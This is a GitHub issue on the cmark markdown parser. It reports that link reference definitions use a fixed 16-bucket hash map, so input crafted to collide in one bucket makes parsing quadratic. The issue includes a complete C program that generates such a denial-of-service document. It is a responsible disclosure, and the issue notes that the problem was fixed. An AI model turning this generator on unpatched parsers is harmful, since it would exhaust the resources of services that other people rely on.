Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pathological input: Reference definitions #220

Closed
mity opened this issue Jul 25, 2017 · 0 comments
Closed

Pathological input: Reference definitions #220

mity opened this issue Jul 25, 2017 · 0 comments

Comments

@mity
Copy link
Contributor

mity commented Jul 25, 2017

Cmark (and Cmark-gfm) stores link reference definitions in a simple fixed-sized (16) hash map.

So lookup drops to linear time if there are many reference definitions because O(n/16) == O(n).

And it is also trivial to create malicious document which targets single bucket of the hash, making the hash completely ineffective. (See the C program generating such document below.) Such document with N reference definitions and N invalid references has O(N^2) time complexity.

#include <stdio.h>
#include <string.h>


#define REFMAP_SIZE     16
#define COUNT           50000


// From cmark/src/references.c:
static unsigned int
refhash(const unsigned char *link_ref)
{
    unsigned int hash = 0;

    while (*link_ref)
        hash = (*link_ref++) + (hash << 6) + (hash << 16) - hash;

    return hash;
}

static inline int
is_bucket_zero(const unsigned char *link_ref)
{
    return (refhash(link_ref) % REFMAP_SIZE) == 0;
}

int
main(int argc, char** argv)
{
    char buffer0[17];
    char buffer[17];
    int i, n;

    buffer[16] = '\0';

    for(i = 0, n = 0; n < COUNT; i++) {
        snprintf(buffer, 16, "x%d", i);

        if(is_bucket_zero(buffer)) {
            if(n == 0) {
                // Remember reference label we shall not define anywhere.
                memcpy(buffer0, buffer, sizeof(buffer0));
            } else {
                // Saturate the bucket 0 of the hash.
                printf("[%s]: /url\n\n", buffer);

                // And force walking whole bucket.
                printf("[%s]\n\n", buffer0);
            }

            n++;
        }
    }

    return 0;
}

(Note I originally reported this to Gihub through their https://hackerone.com/github bounty program. You may find their fix here: github@66a0836)

@mity mity changed the title Pathological input: Refrence definitions Pathological input: Reference definitions Jul 25, 2017
jgm added a commit that referenced this issue Feb 16, 2020
@jgm jgm closed this as completed in b2378e4 Feb 16, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant